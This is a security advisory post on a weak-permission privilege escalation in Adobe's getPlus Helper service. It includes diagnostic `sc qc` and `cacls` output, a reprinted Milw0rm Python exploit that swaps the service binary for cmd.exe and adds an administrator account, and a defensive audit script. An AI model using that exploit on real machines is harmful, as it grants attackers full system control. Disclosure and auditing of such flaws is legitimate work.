
Adobe Local Privilege Escalation Vulnerability

2009-7-29 13:21 | Submitted by: security

Description: The Adobe downloader (here meaning the downloader file) is used to download updates for Adobe applications; it was tested with Acrobat Reader 9.x. The executable is installed with "Full Control" permission for the built-in Users group, so any user can replace the file to serve their own purposes. After the system reboots, it runs with "SYSTEM" privileges.

description:
Adobe downloader used to download updates for Adobe applications.
Shipped with Acrobat Reader 9.x

poc:

    C:\>sc qc "getPlus(R) Helper"
    [SC] GetServiceConfig SUCCESS

    SERVICE_NAME: getPlus(R) Helper
            TYPE               : 110  WIN32_OWN_PROCESS (interactive)
            START_TYPE         : 3   DEMAND_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Programmi\NOS\bin\getPlus_HelperSvc.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : getPlus(R) Helper
            DEPENDENCIES       : RPCSS
            SERVICE_START_NAME : LocalSystem

    C:\>cacls "C:\Programmi\NOS\bin\getPlus_HelperSvc.exe"
    C:\Programmi\NOS\bin\getPlus_HelperSvc.exe BUILTIN\Users:F <-------------- [!!!]
                                               NT AUTHORITY\SYSTEM:F

The executable file is installed with improper permissions, with "full control" for Builtin Users; a simple user can replace it with a binary of choice.
At the next reboot it will run with SYSTEM privileges.

Yesterday Milw0rm published Python exploit code for this issue; it reads as follows:

    #!/usr/bin/env python
    ###################################################################################
    #
    # Adobe Acrobat v9.1.2 Local Privilege Escalation Exploit
    # Coded By: Dr_IDE
    # Discovered by: Nine:Situations:Group
    # Tested On: Windows XP SP2, Requires NOS Package Installed
    # Usage: python Dr_IDE-Adobe_912.py
    #
    ###################################################################################

    import os, subprocess

    #
    # Should probably have a try block around this as not every install
    # of 9.1.2 has the NOS package on it. This is a little touchy so you may have to
    # play around with it.
    #

    # This is a super lame way to do this but it makes it more educational.
    evil =  "echo *************************************************************\n"
    evil += "echo *\n"
    evil += "echo * Adobe Acrobat v9.1.2 Local Privilege Escalation Exploit\n"
    evil += "echo * Coded By: Dr_IDE\n"
    evil += "echo * Discovered By: Nine:Situations:Group\n"
    evil += "echo * Tested On: Windows XP SP2\n"
    evil += "echo *\n"
    evil += "echo *************************************************************\n"
    evil += "echo This will add user Dr_IDE:password to the Admin Group\n"
    evil += "cd C:\\Program Files\\NOS\\bin\n"
    evil += "copy /Y GetPlus_HelperSvc.exe GetPlus_HelperSvc.old\n"
    evil += "copy /Y %systemroot%\\system32\\cmd.exe\n"
    evil += "GetPlus_HelperSvc.exe /C net user Dr_IDE password /ADD\n"
    evil += "GetPlus_HelperSvc.exe /C net localgroup administrators Dr_IDE /ADD\n"
    evil += "GetPlus_HelperSvc.exe /C net user Dr_IDE\n"
    evil += "exit"

    f1 = open('Dr_IDE-Adobe.bat','w')
    f1.write(evil)
    f1.close()

    # Here are two ways to execute this exploit. If you leave both commented just the batch file is created.

    # Silent Way - This should be more stealthy
    #retval = subprocess.call("Dr_IDE-Adobe.bat");

    # Louder Way - On some systems this will probably open a DOS window
    #retval = os.system("Dr_IDE-Adobe.bat");

    # milw0rm.com [2009-07-27]
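The permission check shown in the `sc qc` and `cacls` output above can be automated for auditing. This is an added defensive example, not part of the original post or the Milw0rm code: it parses saved output of those two commands and flags a LocalSystem service whose binary is writable by ordinary users. The function names, the `LOW_PRIV` list and the `CACLS_FIXED` sample are assumptions made for illustration.

```python
import re

# Groups that ordinary (non-admin) accounts belong to (assumed audit list).
LOW_PRIV = {r"BUILTIN\Users", "Everyone", r"NT AUTHORITY\Authenticated Users"}
WRITE_RIGHTS = {"F", "C", "W"}  # cacls letters: Full control, Change, Write

# Output quoted on this page (annotation arrow removed, unused fields omitted).
SC_QC = r"""SERVICE_NAME: getPlus(R) Helper
        BINARY_PATH_NAME   : C:\Programmi\NOS\bin\getPlus_HelperSvc.exe
        SERVICE_START_NAME : LocalSystem"""
CACLS_WEAK = r"""C:\Programmi\NOS\bin\getPlus_HelperSvc.exe BUILTIN\Users:F
                                           NT AUTHORITY\SYSTEM:F"""
# Constructed sample: the same file after the ACL has been tightened.
CACLS_FIXED = r"""C:\Programmi\NOS\bin\getPlus_HelperSvc.exe BUILTIN\Users:R
                                           BUILTIN\Administrators:F
                                           NT AUTHORITY\SYSTEM:F"""

def parse_sc_qc(text):
    """Return the KEY : value fields of `sc qc` output as a dict."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields

def parse_cacls(text, path):
    """Return [(principal, right)] from `cacls <file>` output for path."""
    aces = []
    for line in text.replace(path, "", 1).splitlines():
        principal, sep, rights = line.strip().rpartition(":")
        if sep:
            # Drop inheritance flags such as (OI)(CI) before the right letter.
            aces.append((principal, re.sub(r"\([A-Z]+\)", "", rights).strip()))
    return aces

def audit(sc_text, cacls_text):
    """Flag a LocalSystem service whose binary low-privileged users can replace."""
    svc = parse_sc_qc(sc_text)
    path = svc["BINARY_PATH_NAME"].strip('"')  # assumes no command-line arguments
    weak = [(p, r) for p, r in parse_cacls(cacls_text, path)
            if p in LOW_PRIV and r in WRITE_RIGHTS]
    as_system = svc.get("SERVICE_START_NAME", "").lower() == "localsystem"
    return {"service": svc.get("SERVICE_NAME"), "path": path,
            "weak_aces": weak, "vulnerable": as_system and bool(weak)}

if __name__ == "__main__":
    print(audit(SC_QC, CACLS_WEAK))
    print(audit(SC_QC, CACLS_FIXED))
```

Multi-line "special access" entries in `cacls` output are not handled by this parser.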
